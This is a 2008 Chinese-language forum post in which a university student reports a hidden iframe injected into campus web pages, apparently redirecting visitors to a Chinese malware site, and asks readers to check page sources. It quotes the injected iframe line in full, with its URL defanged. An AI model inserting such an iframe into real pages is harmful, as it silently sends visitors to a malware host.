中毒？木馬？請大家幫忙找看看 - 資安

※ [本文轉錄自 MUSTMIS 看板]

作者: yck0210 (我的心不再流浪) 看板: MUSTMIS
標題: [問題] 中毒？木馬？請大家幫忙找看看
時間: Wed Oct 22 19:59:40 2008

在我們系上網最近會發現學校許多Server都被掛上大陸網站隱藏語法....
我先聲明，我不站在哪個單位，也不喜歡把技術問題給政治化！
我只是想找到問題，知道問題的根源，最重要的是讓大家有一個安全無虞的網路環境～
所以，如果大家也發現跟我一樣有下列的問題，請回應給我！
告訴我您在哪上網的？您是瀏覽哪一個網頁才發現的？

最近學校有些網站會隱藏一些會導入病毒網站的語法....
這個語法會導致看這網頁的同時也導入到這大陸網站！
至於下載什麼東西我們還不清楚，防毒軟體掃瞄本機也沒有病毒～
但是有些網站會看不到內容，狀況畫面如下列二張圖片....

http://img80.imageshack.us/my.php?image=gggggttt1lf5.jpg
http://img89.imageshack.us/my.php?image=gggggttt2kf2.jpg

在這些疑似被入侵的網站內，打開網頁的原始碼的第一行會出現下列語法....
<iframe src=http ://gggggttt.cn/1/zz.htm width=100 height=0></iframe>
^^^^^^^^^^^^^^^^^^^^^^^^^^^^ => 網站故意加空格，怕有人誤連！
進這些網站沒什麼問題，但有的網頁就會打不開，用防毒軟體掃也掃不到！
今天我在網路上survey這個問題，發現台灣地區好像沒人反應，都是大陸在討論～
我整理了一下，發現它的特性，好像是一種ARP攻擊，會造成整個區域網路都中獎！
Norton 網站所公告關於 gggggttt.cn 的說明
http://safeweb.norton.com/report/show?name=gggggttt.cn

原本我的想法如下列所述....
很多人都知道這個問題，都掃毒了也沒發現病毒，計中說網頁也沒被竄改！
在學校上網只要是連80 port會經過proxy server，
也就是一般http網頁都會經過代理伺服器～
如果從校外連進學校就不會經過proxy server，也很正常，所以我懷疑是proxy中毒！
可是有趣的是，只有特定網站才會有這個現象，有的網站就不會有～

網路上有討論說Client端跟Server端都沒問題，病毒是存在Server的記憶體裡，
所以Server重開機就不會有這問題！
但是問題還是沒解決，它有可能藏在SQL Server裡面，一被執行又發作了～
計中說是我們資工系都中毒才會這樣，這句話讓我們系上的老師都很不爽！
我曾經想過會不會是路由器被攻擊，不過路由器只處理到網路的第三層，
所以應該是不太可能～

系上太多電腦了，我光測我的實驗室就快吐了，有的電腦有這現象，有的沒有....
所以，結論是，有看到這篇文章的朋友們幫我測一下，任何校內或校外的網頁都可以！
看看會不會有這問題，在原始碼內的第一行會不會有那一行語法？
如果有請告訴我，告訴我您在哪上網，看哪一個網頁？

謝謝大家的幫忙！

--